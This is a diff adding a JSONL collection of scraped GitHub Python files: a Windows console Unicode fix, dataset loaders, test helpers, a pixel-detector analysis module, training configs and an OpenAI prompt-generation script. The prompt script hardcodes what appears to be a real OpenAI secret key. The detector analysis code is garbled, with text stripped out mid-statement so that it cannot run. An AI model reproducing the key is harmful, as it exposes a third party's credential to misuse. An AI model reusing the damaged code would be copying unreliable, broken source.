diff --git "a/3486.jsonl" "b/3486.jsonl" new file mode 100644--- /dev/null +++ "b/3486.jsonl" @@ -0,0 +1,865 @@ +{"seq_id":"42296682236","text":"import os.path\nimport sys\n\nLOG_FILENAME = \"Xpra.log\"\nREDIRECT_OUTPUT = True\ndef set_redirect_output(on):\n global REDIRECT_OUTPUT\n REDIRECT_OUTPUT = on\ndef set_log_filename(filename):\n global LOG_FILENAME\n LOG_FILENAME = filename\n\ndef fix_unicode_out():\n #code found here:\n #http://stackoverflow.com/a/3259271/428751\n import codecs\n from ctypes import WINFUNCTYPE, windll, POINTER, byref, c_int\n from ctypes.wintypes import BOOL, HANDLE, DWORD, LPWSTR, LPCWSTR, LPVOID\n\n original_stderr = sys.stderr\n\n # If any exception occurs in this code, we'll probably try to print it on stderr,\n # which makes for frustrating debugging if stderr is directed to our wrapper.\n # So be paranoid about catching errors and reporting them to original_stderr,\n # so that we can at least see them.\n def _complain(message):\n print >>original_stderr, message if isinstance(message, str) else repr(message)\n\n # Work around .\n codecs.register(lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None)\n\n # Make Unicode console output work independently of the current code page.\n # This also fixes .\n # Credit to Michael Kaplan \n # and TZOmegaTZIOY\n # .\n try:\n # \n # HANDLE WINAPI GetStdHandle(DWORD nStdHandle);\n # returns INVALID_HANDLE_VALUE, NULL, or a valid handle\n #\n # \n # DWORD WINAPI GetFileType(DWORD hFile);\n #\n # \n # BOOL WINAPI GetConsoleMode(HANDLE hConsole, LPDWORD lpMode);\n\n GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)((\"GetStdHandle\", windll.kernel32))\n STD_OUTPUT_HANDLE = DWORD(-11)\n STD_ERROR_HANDLE = DWORD(-12)\n GetFileType = WINFUNCTYPE(DWORD, DWORD)((\"GetFileType\", windll.kernel32))\n FILE_TYPE_CHAR = 0x0002\n FILE_TYPE_REMOTE = 0x8000\n GetConsoleMode = WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))((\"GetConsoleMode\", windll.kernel32))\n INVALID_HANDLE_VALUE = DWORD(-1).value\n\n def not_a_console(handle):\n if handle == INVALID_HANDLE_VALUE or handle is None:\n return True\n return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR\n or GetConsoleMode(handle, byref(DWORD())) == 0)\n\n old_stdout_fileno = None\n old_stderr_fileno = None\n if hasattr(sys.stdout, 'fileno'):\n old_stdout_fileno = sys.stdout.fileno()\n if hasattr(sys.stderr, 'fileno'):\n old_stderr_fileno = sys.stderr.fileno()\n\n STDOUT_FILENO = 1\n STDERR_FILENO = 2\n real_stdout = (old_stdout_fileno == STDOUT_FILENO)\n real_stderr = (old_stderr_fileno == STDERR_FILENO)\n\n if real_stdout:\n hStdout = GetStdHandle(STD_OUTPUT_HANDLE)\n if not_a_console(hStdout):\n real_stdout = False\n\n if real_stderr:\n hStderr = GetStdHandle(STD_ERROR_HANDLE)\n if not_a_console(hStderr):\n real_stderr = False\n\n if real_stdout or real_stderr:\n # BOOL WINAPI WriteConsoleW(HANDLE hOutput, LPWSTR lpBuffer, DWORD nChars,\n # LPDWORD lpCharsWritten, LPVOID lpReserved);\n\n WriteConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)((\"WriteConsoleW\", windll.kernel32))\n\n class UnicodeOutput:\n def __init__(self, hConsole, stream, fileno, name):\n self._hConsole = hConsole\n self._stream = stream\n self._fileno = fileno\n self.closed = False\n self.softspace = False\n self.mode = 'w'\n self.encoding = 'utf-8'\n self.name = name\n self.flush()\n\n def isatty(self):\n return False\n\n def close(self):\n # don't really close the handle, that would only cause problems\n self.closed = True\n\n def fileno(self):\n return self._fileno\n\n 
def flush(self):\n if self._hConsole is None:\n try:\n self._stream.flush()\n except Exception as e:\n _complain(\"%s.flush: %r from %r\" % (self.name, e, self._stream))\n raise\n\n def write(self, text):\n try:\n if self._hConsole is None:\n if isinstance(text, unicode):\n text = text.encode('utf-8')\n self._stream.write(text)\n else:\n if not isinstance(text, unicode):\n text = str(text).decode('utf-8')\n remaining = len(text)\n while remaining:\n n = DWORD(0)\n # There is a shorter-than-documented limitation on the\n # length of the string passed to WriteConsoleW (see\n # .\n retval = WriteConsoleW(self._hConsole, text, min(remaining, 10000), byref(n), None)\n if retval == 0 or n.value == 0:\n raise IOError(\"WriteConsoleW returned %r, n.value = %r\" % (retval, n.value))\n remaining -= n.value\n if not remaining:\n break\n text = text[n.value:]\n except Exception as e:\n _complain(\"%s.write: %r\" % (self.name, e))\n raise\n\n def writelines(self, lines):\n try:\n for line in lines:\n self.write(line)\n except Exception as e:\n _complain(\"%s.writelines: %r\" % (self.name, e))\n raise\n\n if real_stdout:\n sys.stdout = UnicodeOutput(hStdout, None, STDOUT_FILENO, '')\n else:\n sys.stdout = UnicodeOutput(None, sys.stdout, old_stdout_fileno, '')\n\n if real_stderr:\n sys.stderr = UnicodeOutput(hStderr, None, STDERR_FILENO, '')\n else:\n sys.stderr = UnicodeOutput(None, sys.stderr, old_stderr_fileno, '')\n except Exception as e:\n _complain(\"exception %r while fixing up sys.stdout and sys.stderr\" % (e,))\n\n\ndef do_init():\n if not REDIRECT_OUTPUT:\n fix_unicode_out()\n return\n global LOG_FILENAME\n from paths import _get_data_dir\n d = _get_data_dir()\n log_file = os.path.join(d, LOG_FILENAME)\n sys.stdout = open(log_file, \"a\")\n sys.stderr = sys.stdout\n","repo_name":"dscho/Xpra","sub_path":"src/xpra/platform/win32/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"75"} +{"seq_id":"27052078484","text":"from PIL import Image\nfrom torchvision.transforms import ToTensor, ToPILImage\nimport os\nimport random\nfrom torch.utils.data import Dataset\n\n\nclass CardsDataset(Dataset):\n def __init__(self, img_dir='data', train=True, transform=None):\n\n self.seeds = [\"bastoni\", \"spade\", \"coppe\", \"denari\"]\n\n self.cards_names = [\"asso\", \"2\", \"3\", \"4\",\"5\",\"6\",\"7\",\"fante\",\"cavallo\",\"re\"]\n self.n_cards = 40\n self.train=train\n self.img_dir = img_dir\n\n if not self.train:\n self.img_dir = self.img_dir+\"/test\"\n\n self.labels={}\n self.img_names = []\n\n self.transform = transform\n self.to_tensor = ToTensor()\n self.to_pil = ToPILImage()\n\n #carica carte\n for seed in self.seeds:\n for j in self.cards_names:\n for i in range(0,self.n_cards):\n str = os.path.join(self.img_dir,\"{}_{}/{}_{}{}.png\".format(j, seed, j, seed, i))\n if os.path.isfile(str):\n self.img_names.append(str)\n self.labels[len(self.img_names)-1]=self.seeds.index(seed)*10+self.cards_names.index(j)\n if self.train:\n print(\"Train\")\n else:\n print(\"Test\")\n print(\"Loaded {}\".format(len(self.img_names)))\n\n def __len__(self):\n return len(self.img_names)\n\n def __getitem__(self, index):\n\n X = Image.open(self.img_names[index])\n\n if self.transform is not None:\n X = self.transform(X)\n\n return X,self.index_to_label(index)\n\n def index_to_label(self,idx):\n return self.labels[idx]\n\n def index_to_string(self, idx):\n return 
self.img_names[idx].split(\"/\")[1]\n","repo_name":"narder-davide/ProgettoIVU","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2129707303","text":"import pytest\nimport xml.etree.ElementTree as ET\n\nfrom typing import Optional\n\nxfail = pytest.mark.xfail\nskip = pytest.mark.skip\nskipif = pytest.mark.skipif\n\nfrom dingsda import *\nfrom dingsda.errors import *\nfrom dingsda.lib import *\n\nif not ONWINDOWS:\n devzero = open(\"/dev/zero\", \"rb\")\n\nident = lambda x: x\n\ndef raises(func, *args, **kw):\n try:\n return func(*args, **kw)\n except Exception as e:\n return e.__class__\n\n\ndef common(format: Construct, datasample: bytes, objsample: Container, objsample_build: Optional[Container] = None, preprocess: bool = False, **kw):\n r\"\"\"\n :param format: the construct to test\n :param datasample: a sample of the data to parse\n :param objsample: the object that should be parsed from the data\n :param objsample_build: an example object that should produce the same datasample (optional). Used to test Rebuilds.\n :param preprocess: whether to preprocess the data before parsing (optional). Used to test special cases, where it is needed.\n :param kw: additional keyword arguments to pass to the context when parsing and building\n \"\"\"\n # following are implied (re-parse and re-build)\n # assert format.parse(format.build(obj)) == obj\n # assert format.build(format.parse(data)) == data\n obj = format.parse(datasample, **kw)\n assert obj == objsample\n\n build_object = objsample\n if preprocess:\n build_object, extra_info = format.preprocess(objsample, context=kw)\n\n data = format.build(build_object, **kw)\n assert data == datasample\n\n if objsample_build is not None:\n data2 = format.build(obj)\n assert data2 == datasample\n\n\ndef commonhex(format: Construct, hexdata):\n commonbytes(format, binascii.unhexlify(hexdata))\n\n\ndef commondumpdeprecated(format: Construct, filename: str):\n filename = \"tests/deprecated_gallery/blobs/\" + filename\n with open(filename,'rb') as f:\n data = f.read()\n commonbytes(format, data)\n\n\ndef commondump(format, filename):\n filename = \"tests/gallery/blobs/\" + filename\n with open(filename,'rb') as f:\n data = f.read()\n commonbytes(format, data)\n\n\ndef commonbytes(format, data):\n obj = format.parse(data)\n data2 = format.build(obj)\n\n\ndef common_xml_test(s, xml, obj, obj_from = None):\n if obj_from is None:\n obj_from = obj\n test_et = ET.fromstring(xml)\n test_obj = s.fromET(xml=test_et)\n assert(obj_from == test_obj)\n test_xml = s.toET(obj=obj, name=\"test\")\n test_xml_str = ET.tostring(test_xml)\n assert(test_xml_str == xml)\n\n\ndef common_endtoend_xml_test(s, byte_data, obj=None, xml=None):\n data = s.parse(byte_data)\n if obj is not None:\n assert(data == obj)\n test_xml = s.toET(obj=data, name=\"test\")\n if xml is not None:\n assert(ET.tostring(test_xml) == xml)\n xml_data = s.fromET(xml=test_xml)\n assert(byte_data == s.build(xml_data))\n\n\ndef size_test(format: Construct, obj: Container, static_size: Optional[int] = None, size: Optional[int] = None, full_size: Optional[int] = None):\n if static_size is not None:\n assert(format.static_sizeof() == static_size)\n if size is not None:\n assert(format.sizeof(obj) == size)\n if full_size is not None:\n assert(format.full_sizeof(obj) == full_size)\n\n assert(static_size is not None or size is not None or full_size is not 
None)\n","repo_name":"ev1313/dingsda","sub_path":"tests/declarativeunittest.py","file_name":"declarativeunittest.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15630104456","text":"import json\nimport os\n\nfrom monary import Monary\nimport pandas\n\n\ndef load_config(config_path=None):\n if not config_path:\n config_path = os.path.expanduser(\"~\") + \"/.sensible_raw/loader_config.json\"\n\n return json.loads(open(config_path, \"r\").read())\n\n\ndef get_index(index_name, raw_value):\n config = load_config()\n columns, data = load_from_db(\"indices\", index_name, [\"index\"], [\"int32\"], config[\"db_host\"],\n query_spec={\"raw_value\": raw_value})\n if len(data) == 0 or len(data[0]) == 0:\n return -1\n\n return data[0][0]\n\n\ndef docs(data_type):\n pandas.set_option('display.max_colwidth', -1)\n documentation_folder = os.path.abspath(__file__ + \"/../../\")\n return pandas.read_csv(os.path.join(documentation_folder, \"documentation_files\", data_type + \".csv\"))\n\n\ndef get_raw_value(index_name, indexed_value):\n config = load_config()\n columns, data = load_from_db(\"indices\", index_name, [\"raw_value\"], [\"string:100\"], config[\"db_host\"],\n query_spec={\"index\": indexed_value})\n if len(data) == 0 or len(data[0]) == 0:\n return -1\n\n return data[0][0]\n\n\ndef load_data(data_type, month, config=None, as_dataframe=False):\n if not config:\n config = load_config()\n columns, data = load_from_db(data_type,\n month,\n config[\"data_types\"][data_type][\"field_names\"],\n config[\"data_types\"][data_type][\"field_types\"],\n config[\"db_host\"])\n\n if not as_dataframe:\n return columns, data\n\n dict = {}\n for column, array in zip(columns, data):\n dict[column] = array\n return pandas.DataFrame(dict)\n\n\ndef load_from_db(db, collection, field_names, field_types, db_host, query_spec={}):\n with Monary(host=db_host[\"hostname\"], username=db_host[\"username\"], password=db_host[\"password\"],\n database=\"admin\") as monary:\n arrays = monary.query(\n db, # database name\n collection, # collection name\n query_spec, # query spec\n field_names, # field names (in Mongo record)\n field_types # Monary field types (see below)\n )\n\n return field_names, arrays\n","repo_name":"RaduGatej/sensible_raw","sub_path":"sensible_raw/loaders/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"37778751991","text":"# Create a while loop that prints even numbers from 10 down to 2\r\n# 10, 8, 6, 4, 2\r\n\r\n#Student ID: 1201200039\r\n#Student Name: Tan Jiue Hong\r\n\r\nstart = 10\r\nwhile (start):\r\n print(start, end=\" \")\r\n start = start - 2\r\n","repo_name":"1201200039/DPL5211Tri2110","sub_path":"Lab 4/Lab 4.2.py","file_name":"Lab 4.2.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3425760062","text":"import numpy as np\nimport tables as tb\nimport logging\nimport numba\nfrom tqdm import tqdm\n\nfrom tjmonopix.analysis import analysis_utils as au\nfrom tjmonopix.analysis import interpreter, event_builder\nfrom pixel_clusterizer.clusterizer import HitClusterizer\n\nlogging.basicConfig(\n format=\"%(asctime)s - [%(name)-8s] - %(levelname)-7s %(message)s\")\nloglevel = logging.INFO\n\n\nclass Analysis():\n def __init__(self, raw_data_file=None, 
cluster_hits=False, build_events=False, build_events_simple=False):\n\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.setLevel(loglevel)\n\n self.build_events = build_events\n self.build_events_simple = build_events_simple\n if self.build_events and self.build_events_simple:\n raise RuntimeError(\"Please decide for one type of event building only\")\n\n self.raw_data_file = raw_data_file\n self.chunk_size = 200000\n self.cluster_hits = cluster_hits\n if self.cluster_hits:\n self._setup_clusterizer()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def _setup_clusterizer(self):\n ''' Define data structure and settings for hit clusterizer package '''\n\n # Define all field names and data types\n hit_fields = {'event_number': 'event_number',\n 'frame': 'frame',\n 'column': 'column',\n 'row': 'row',\n 'charge': 'charge',\n }\n\n hit_description = [('event_number', ' max_col:\n max_col = hits[i].column\n if hits[i].row < min_row:\n min_row = hits[i].row\n if hits[i].row > max_row:\n max_row = hits[i].row\n\n if max_col - min_col < 8 and max_row - min_row < 8:\n # Make 8x8 array\n col_base = 7 + min_col - center_col\n row_base = 7 + min_row - center_row\n cluster_arr = hit_arr[col_base:col_base + 8,\n row_base:row_base + 8]\n # Finally calculate cluster shape\n # uint64 desired, but numexpr and others limited to int64\n if cluster_arr[7, 7] == 1:\n cluster_shape = np.int64(-1)\n else:\n cluster_shape = np.int64(\n au.calc_cluster_shape(cluster_arr))\n else:\n # Cluster is exceeding 8x8 array\n cluster_shape = np.int64(-1)\n\n clusters[cluster_index].cluster_shape = cluster_shape\n clusters[cluster_index].dist_col = max_col - min_col + 1\n clusters[cluster_index].dist_row = max_row - min_row + 1\n\n def end_of_cluster_function(hits, clusters, cluster_size,\n cluster_hit_indices, cluster_index,\n cluster_id, charge_correction,\n noisy_pixels, disabled_pixels,\n seed_hit_index):\n _end_of_cluster_function(hits, clusters, cluster_size,\n cluster_hit_indices, cluster_index,\n cluster_id, charge_correction,\n noisy_pixels, disabled_pixels,\n seed_hit_index)\n\n # Define end of cluster function for calculating TDC related cluster properties\n def end_of_cluster_function_tdc(hits, clusters, cluster_size,\n cluster_hit_indices, cluster_index,\n cluster_id, charge_correction,\n noisy_pixels, disabled_pixels,\n seed_hit_index):\n _end_of_cluster_function(hits, clusters, cluster_size,\n cluster_hit_indices, cluster_index,\n cluster_id, charge_correction,\n noisy_pixels, disabled_pixels,\n seed_hit_index)\n\n # Calculate cluster TDC and cluster TDC status\n cluster_tdc = 0\n cluster_tdc_status = 1 # valid\n for j in range(clusters[cluster_index].n_hits):\n hit_index = cluster_hit_indices[j]\n cluster_tdc += hits[hit_index].tdc_value\n cluster_tdc_status &= (hits[hit_index].tdc_status == 0x00000001) # check for valid TDC status\n clusters[cluster_index].tdc_value = cluster_tdc\n clusters[cluster_index].tdc_status = cluster_tdc_status\n\n # Initialize clusterizer with custom hit/cluster fields\n self.clz = HitClusterizer(\n hit_fields=hit_fields,\n hit_dtype=hit_dtype,\n cluster_fields=cluster_fields,\n cluster_dtype=self.cluster_dtype,\n min_hit_charge=0,\n max_hit_charge=64,\n column_cluster_distance=4,\n row_cluster_distance=4,\n frame_cluster_distance=10,\n ignore_same_hits=True)\n\n# # Set end_of_cluster function for shape and distance calculation\n# if self.analyze_tdc:\n# # If analyze TDC data, set also end of cluster 
function for calculating TDC properties\n# self.clz.set_end_of_cluster_function(end_of_cluster_function_tdc)\n# else:\n self.clz.set_end_of_cluster_function(end_of_cluster_function)\n\n def analyze_data(self):\n self.analyzed_data_file = self.raw_data_file[:-3] + '_interpreted.h5'\n hit_dtype = [\n ('col', 'u1'),\n ('row', ' 0,\n cluster['cluster_shape'] < 300)\n cs_shape = np.bincount(cluster['cluster_shape'][sel],\n minlength=300)[:300]\n # Add to total hists\n hist_cs_size += cs_size.astype(np.uint32)\n hist_cs_tot += cs_tot.astype(np.uint32)\n hist_cs_shape += cs_shape.astype(np.uint32)\n\n pbar.update(tmp_end - start)\n start = tmp_end\n pbar.close()\n\n # TODO: Copy all attributes properly to output_file, maybe own table\n out_file.root.Dut.attrs.scan_id = in_file.root.meta_data.attrs.scan_id\n self._create_additional_hit_data()\n self.logger.info(\"{:d} errors occured during analysis\".format(data_interpreter.get_error_count()))\n if self.build_events:\n self.logger.info(\"{:d} events built\".format(n_events))\n\n# self._create_additional_hit_data()\n if self.cluster_hits:\n self._create_additional_cluster_data(hist_cs_size, hist_cs_tot, hist_cs_shape)\n\n def _create_additional_hit_data(self):\n with tb.open_file(self.analyzed_data_file, 'r+') as out_file:\n hits = out_file.root.Dut[:]\n scan_id = out_file.root.Dut.attrs[\"scan_id\"]\n\n hist_occ = au.occ_hist2d(hits)\n\n out_file.create_carray(out_file.root,\n name='HistOcc',\n title='Occupancy Histogram',\n obj=hist_occ,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n\n # TODO: ToT Histogram?\n\n if scan_id in [\"threshold_scan\"]:\n n_injections = 100 # TODO: get from run configuration\n scan_param_range = np.arange(0, self.n_params + 1, 1) # TODO: get from run configuration\n\n hist_scurve = au.scurve_hist3d(hits, scan_param_range)\n\n out_file.create_carray(out_file.root,\n name=\"HistSCurve\",\n title=\"Scurve Data\",\n obj=hist_scurve,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n\n ave_tots = au.tot_ave3d(hits, scan_param_range)\n ave_tots = np.array(ave_tots, dtype=np.float32) / np.array(hist_scurve, dtype=np.float32)\n out_file.create_carray(out_file.root,\n name=\"ToTAve\",\n title=\"ToT average\",\n obj=ave_tots,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n\n self.threshold_map, self.noise_map, self.chi2_map = au.fit_scurves_multithread(\n hist_scurve.reshape(112 * 224, self.n_params + 1), scan_param_range, n_injections=n_injections, invert_x=False\n )\n\n out_file.create_carray(out_file.root, name='ThresholdMap', title='Threshold Map', obj=self.threshold_map,\n filters=tb.Filters(complib='blosc', complevel=5, fletcher32=False))\n out_file.create_carray(out_file.root, name='NoiseMap', title='Noise Map', obj=self.noise_map,\n filters=tb.Filters(complib='blosc', complevel=5, fletcher32=False))\n out_file.create_carray(out_file.root, name='Chi2Map', title='Chi2 / ndf Map', obj=self.chi2_map,\n filters=tb.Filters(complib='blosc', complevel=5, fletcher32=False))\n\n def _create_additional_cluster_data(self, hist_cs_size, hist_cs_tot, hist_cs_shape):\n '''\n Store cluster histograms in analyzed data file\n '''\n with tb.open_file(self.analyzed_data_file, 'r+') as out_file:\n out_file.create_carray(out_file.root,\n name='HistClusterSize',\n title='Cluster Size Histogram',\n obj=hist_cs_size,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n out_file.create_carray(out_file.root,\n name='HistClusterTot',\n 
title='Cluster ToT Histogram',\n obj=hist_cs_tot,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n out_file.create_carray(out_file.root,\n name='HistClusterShape',\n title='Cluster Shape Histogram',\n obj=hist_cs_shape,\n filters=tb.Filters(complib='blosc',\n complevel=5,\n fletcher32=False))\n","repo_name":"SiLab-Bonn/tjmonopix-daq","sub_path":"tjmonopix/analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":21733,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"72942155442","text":"import os\nimport sys\nfrom datetime import datetime\nimport time\nimport torch\nimport numpy as np\nimport torch.distributed\nimport torch.backends.cudnn\nimport trainer_distributed as trainer\nimport argparse\nimport random\n\ncfg = {\n \"local_rank\": 0, # will set later\n \"world_size\": 10,\n # const configuration <<<<<<<<<<<<<<<<\n \"log_prefix\": \"./log/\",\n \"tensorboard_logdir\": \"run1/\",\n \"mpi_outdir\": \"mpi/\",\n \"checkpoint_dir\": \"checkpoint/\",\n \"unique_id\": \"FinalLDI\",\n\n \"write_validate_result\": True,\n \"validate_num\": 64,\n \"valid_freq\": 2000,\n \"train_report_freq\": 20,\n\n # about training <<<<<<<<<<<<<<<<\n # comment of current epoch, will print on config.txt\n \"id\": \"\",\n \"comment\": \"\",\n\n \"trainset\": \"m+r+s_seq\",\n \"evalset\": \"stereovideo_seq\",\n \"model_name\": \"LDI\",\n \"modelloss_name\": \"fulljoint\",\n \"batch_size\": 1,\n \"num_epoch\": 500,\n \"savepth_iter_freq\": 400,\n \"lr\": 2e-4,\n \"lr_milestones\": [12e3, 24e3, 36e3],\n \"lr_values\": [0.5, 0.25, 0.125],\n \"check_point\": {\n \"\": \"FinalLDI_r0.pth\"\n },\n \"loss_weights\": {\n \"pixel_loss_cfg\": 'l1',\n \"pixel_loss\": 1,\n \"net_smth_loss\": 0.5,\n \"depth_loss\": 1,\n \"flownet_dropout\": 1,\n\n \"bg_supervision\": 0.1,\n\n \"scale_mode\": \"adaptive\",\n # \"scale_scaling\": 1,\n\n \"upmask_magaware\": True,\n \"mask_warmup\": 1,\n \"mask_warmup_milestone\": [1e18, 2e18],\n # \"bgflow_warmup\": 1,\n # \"bgflow_warmup_milestone\": [2e3, 4e3],\n # \"aflow_fusefgpct\": False,\n\n # \"tempnewview_mode\": \"biflow\",\n # \"tempnewview_loss\": 0,\n },\n}\n\n\n# TODO\n# * List:\n# implement LDI (either train in Kitti or implement LDI and train in my dataset (former is easier))\n# adjust my model until that problem is resolved\n# * Implement:\n# temporal consistency - learning blind temporal consistency - running\n# temporal consistency - blind + dvp\n# temporal consistency - naive filtering in original resolution\n# novel view synthesis - LDI [+temp]\n# novel view synthesis - MPI [+temp]\n# depth from video - WSVD - ok\n# depth from video - MiDaVS - ok\n# depth from video - MannequinChanllenge (single-frame methods) - ok\n# * When have free time:\n# temporal consistency - blind temporal consistency\n# depth from video - MannequinChanllenge (two-frame methods)\n# novel view synthesis - 3D Ken-Burn\n# novel view synthesis - Synsin\n# * Evaluator:\n# run in realtime\n\n\ndef main(cfg):\n \"\"\"\n Please specify the id and comment!!!!!!!!!\n \"\"\"\n cfg[\"id\"] = \"FinalLDI\"\n cfg[\"comment\"] = \"use the final stereo_video as test\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--local_rank\", type=int)\n args = parser.parse_args()\n cfg[\"local_rank\"] = args.local_rank\n\n # the settings for debug\n # please comment this\n if \"LOGNAME\" in os.environ.keys() and os.environ[\"LOGNAME\"] == 'jrchan':\n print(\"Debug Mode!!!\", flush=True)\n 
cfg[\"comment\"] = \"Don't forget to change comment\" * 50\n cfg[\"world_size\"] = 2\n cfg[\"train_report_freq\"] = 1\n cfg[\"valid_freq\"] = 20\n else:\n import warnings\n warnings.filterwarnings(\"ignore\")\n\n print(\"Cuda available devices:\")\n devices_num = torch.cuda.device_count()\n for device in range(devices_num):\n print(f\"{device}: {torch.cuda.get_device_name(device)}\")\n print(f\"------------- start running (PID: {os.getpid()} Rank: {cfg['local_rank']})--------------\", flush=True)\n torch.cuda.set_device(cfg[\"local_rank\"])\n\n seed = np.random.randint(0, 10000)\n print(f\"RANK_{cfg['local_rank']}: random seed = {seed}\")\n cfg[\"comment\"] += f\", random seed = {seed}\"\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = True\n np.random.seed(seed)\n random.seed(seed)\n torch.distributed.init_process_group('nccl', world_size=cfg[\"world_size\"], init_method='env://')\n\n trainer.train(cfg)\n\n\nif __name__ == \"__main__\":\n main(cfg)\n","repo_name":"limacv/mono_mpv","sub_path":"main_train_ddp.py","file_name":"main_train_ddp.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"35220475839","text":"import unittest\n\nimport messages\nfrom monitor import Monitor\n\n\nclass DummyConnection(object):\n next_msg = None\n sent_msg = None\n\n def __init__(self):\n pass\n\n def send_message(self, msg):\n self.sent_msg = msg\n\n def get_message(self):\n return self.next_msg\n\n\nclass TestPack(unittest.TestCase):\n\n def test_login(self):\n m = messages.LoginMessage()\n self.assertEqual(m.pack(), b'')\n\n def test_stats(self):\n m = messages.StatsMessage(1234, b'Name:Me\\nMaxJobs:4')\n self.assertEqual(m.pack(),\n b'\\x00\\x00\\x04\\xd2'\n b'\\x00\\x00\\x00\\x11'\n b'Name:Me\\nMaxJobs:4\\x00'\n )\n\n def test_local_job_begin(self):\n m = messages.LocalJobBeginMessage(1001, 2001, 0, b'test_file.c')\n self.assertEqual(m.pack(),\n b'\\x00\\x00\\x07\\xd1' # Job ID: 2001\n b'\\x00\\x00\\x03\\xe9' # Client ID: 1001\n b'\\x00\\x00\\x00\\x00' # Timestamp.\n b'\\x00\\x00\\x00\\x0b' # Filename length.\n b'test_file.c\\x00' # Filename.\n )\n\n def test_local_job_done(self):\n m = messages.LocalJobDoneMessage(2001)\n self.assertEqual(m.pack(), b'\\x00\\x00\\x07\\xd1')\n\n\nclass TestMonitor(unittest.TestCase):\n\n def test_negative_jobs(self):\n \"\"\"Test that a CS can't go into negative active jobs.\"\"\"\n m = Monitor(DummyConnection())\n\n # Receive JobBegin messages before CS Stats.\n m.handleGetCS(messages.GetCSMessage(\"file.c\", 1, 1, 201))\n m.handleJobBegin(messages.JobBeginMessage(1, 0, 101))\n\n # Activate the CS.\n stats = messages.StatsMessage(101, b'')\n stats.data[\"Name\"] = \"cs1\"\n stats.data[\"IP\"] = \"1.1.1.1\"\n stats.data[\"MaxJobs\"] = \"4\"\n m.handleStats(stats)\n\n # Receive a JobDone twice for the same job.\n m.handleJobDone(messages.JobDoneMessage(1, 0,\n 0, 0, 0, 0, # We don't care\n 0, 0, 0, 0, 0)) # about these.\n m.handleJobDone(messages.JobDoneMessage(1, 0,\n 0, 0, 0, 0, # We don't care\n 0, 0, 0, 0, 0)) # about these.\n self.assertEqual(m.cs[101].active_jobs(), 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"rynorris/pyicemon","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22839121532","text":"import json\nimport openai\nimport 
copy\nfrom openai.error import RateLimitError\nimport backoff\nfrom tqdm import tqdm\n\nqna_path_yesno = \"CPL-master/CPL/prompt/infilled_template/yesno.json\"\n\nwith open(qna_path_yesno) as f:\n #data = [json.loads(line) for line in f]\n data=json.load(f)\n \n\n \nopenai.api_key = \"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\"\n\ninitial_prompt=\"Q:is this a creamy soup?/nA1:this is a creamy soup/nA2:this is not a creamy soup/n\"\n#print(initial_prompt)\n\nprompts=[initial_prompt+\"Q:\"+dat[\"question\"]+\"/nA1:\"+dat[\"prompt\"]+\"/nA2:\" for idx,dat in enumerate(data)]\n\nall_responses=[]\n\n#prompts=prompts[10000:30000]\n\n\n@backoff.on_exception(backoff.expo, RateLimitError)\ndef completions_with_backoff(curr_prompt):\n response = openai.Completion.create(\n #engine=\"text-davinci-003\",\n engine=\"text-curie-001\",\n prompt=curr_prompt,\n temperature=0,\n max_tokens = 85,\n n=1,\n stop=\".\"\n ) \n return response\n\n\nfor curr_prompt in tqdm(prompts):\n \n\n response = completions_with_backoff(curr_prompt)\n all_responses.append(response[\"choices\"][0][\"text\"])\n\nnew_data=copy.deepcopy(data)\n\nj=0\nstart = 0 \nend=len(new_data)\nfor i in range(start,end):\n new_data[i][\"prompt2\"] = all_responses[j]\n j+=1\n\n#with open(\"new_file_opt_10000_to_30000.json.json\", 'w') as f:\nwith open(\"new_file_gpt_all.json.json\", 'w') as f:\n\tjson.dump(new_data, f)\n\n","repo_name":"kshama2705/MC-VQA-using-customized-prompts","sub_path":"yes_no_qn_prompt_gen.py","file_name":"yes_no_qn_prompt_gen.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31251948432","text":"import datetime\nimport threading\nimport time\nfrom typing import Any\nimport requests\nimport json\nimport getapi\nimport mate\n\n\n\nrun_list =[]\n#A helper that converts [hours, minutes, seconds] into seconds\ndef run_time(hour,minute,second):\n return hour*3600+minute*60+second\n\n#Put the scheduled time points and the commands to run into a list\nrun_list.append([run_time(10,8,0),{\"g_command\":\"get_department_report_easy\",\"department\":3},1,\"[Pre-run command test] Duo'er, 